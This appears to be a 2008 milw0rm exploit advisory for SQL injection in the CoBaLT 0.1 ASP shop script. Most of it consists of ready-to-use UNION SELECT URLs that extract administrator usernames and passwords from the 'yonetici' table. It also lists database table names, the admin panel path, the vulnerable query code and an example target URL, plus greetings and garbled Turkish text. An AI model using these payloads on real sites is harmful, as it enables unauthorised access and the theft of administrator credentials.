CoBaLT 0.1 Multiple Remote SQL Injection Vulnerabilities.pdf

1 _−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_− 2 3 CoBaLT v1.0 Remote SQL Ä°njection Vulnerabiltiy 4 5 Discovered : U238 6 7 Mail : setuid.noexec0x1@hotmail.com 8 9 WebPage : http://ugur238.org (The End) 10 11 12 Script: http://www.aspindir.com/indir.asp?ID=5414 13 14 Script (Alternativ) : http://rapidshare.de/files/39031038/cobaltv.1.zip.html 15 16 _−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_−_− 17 18 Exploit: 19 20 http://localhost:2222/lab/cobaltv.1/urun.asp?id=24+union+select+0,1,sifre,3,kadi+from+yonetici 21 22 http://localhost:2222/lab/cobaltv.1/admin/bayi_listele.asp?git=duzenle&id=98+union+select+0,1,2,3,sifre,5,kadi,7,8+fr om+yonetici+where+id=2 23 24 −−−− 25 http://localhost:2222/lab/cobaltv.1/admin/urun_grup_listele.asp?git=duzenle&id=24+union+select+0,kadi+from+yonetici 26 27 http://localhost:2222/lab/cobaltv.1/admin/urun_grup_listele.asp?git=duzenle&id=24+union+select+0,sifre+from+yonetici 28 29 −−−− 30 31 http://localhost:2222/lab/cobaltv.1/admin/urun_listele.asp?id=1+union+select+kadi,sifre,kadi,sifre,sifre+from+yonetic i 32 33 34 Admin Panel : localhost/path/admin 35 36 Other Table : bayi − sepet − siparis − siparis_urun − urun − urun_grup − yonetici 37 38 39 Dork : Sevmem bole seylerÄ± , abi anlamÄ±orum ne bos adamlarsÄ±nÄ±z :( 40 41 42 Error Code: 43 44 id=Request.QueryString("id") 45 46 SQL="select * from sepet where id="&"id" 47 48 49 Example Site : http://xxx.org/cobaltv1/urun.asp?id=24+union+select+0,1,sifre,3,kadi+from+yonetici 50 Page 1/2 CoBaLT 0.1 Multiple Remote SQL Injection Vulnerabilities U238 04/05/2008 51 _−_−_−_−_− NURCÄ°HAN _−_−_−_−_− BU SEVDA BÄ°TMEZ _−_−_−_−_− 4 YIL OLDU Amk 52 53 Greatz To : The_BekiR _−_ ka0x _−_ Nettoxic _−_ ZeberuS _−_ Str0ke 54 55 # milw0rm.com [2008−04−05] Page 2/2 CoBaLT 0.1 Multiple Remote SQL Injection Vulnerabilities U238 04/05/2008